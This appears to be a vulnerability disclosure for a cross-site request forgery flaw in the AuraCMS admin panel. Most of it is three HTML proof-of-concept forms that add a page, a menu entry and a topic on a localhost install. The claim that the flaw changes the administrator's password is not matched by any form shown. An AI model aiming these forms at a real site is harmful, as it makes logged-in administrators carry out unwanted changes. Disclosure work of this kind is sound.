There is a cross-site request forgery vulnerability in admin.php

[FuryKangaroo]

There is a cross-site request forgery vulnerability in admin.php?mod=users
It and can change administrator's password.
First:
After the administrator logged in,open the poc page.
Aura.txt to Aura.html --> 1.add page;2.add menu;3.Submit topic
1.add page


2.add menu



3.submit topic


4.CSRF POC:

<!--Add page-->
<html>
  <!-- CSRF PoC -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/test/06AuraCMS-master/admin.php?mod=content" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="title" value="1234567" />
      <input type="hidden" name="content" value="Success!!!" />
      <input type="hidden" name="submitpages" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
<!--Add menu-->
<html>
  <!-- CSRF PoC-->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/test/06AuraCMS-master/admin.php?mod=menu" method="POST">
      <input type="hidden" name="title" value="apple" />
      <input type="hidden" name="url" value="http&#58;&#47;&#47;apple&#46;com" />
      <input type="hidden" name="parentid" value="0" />
      <input type="hidden" name="position" value="top" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
<!--Submit Topic-->
<html>
  <!-- CSRF PoC  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/test/06AuraCMS-master/admin.php?mod=content" method="POST">
      <input type="hidden" name="topic" value="topic" />
      <input type="hidden" name="submittopic" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Aura.txt

[FuryKangaroo]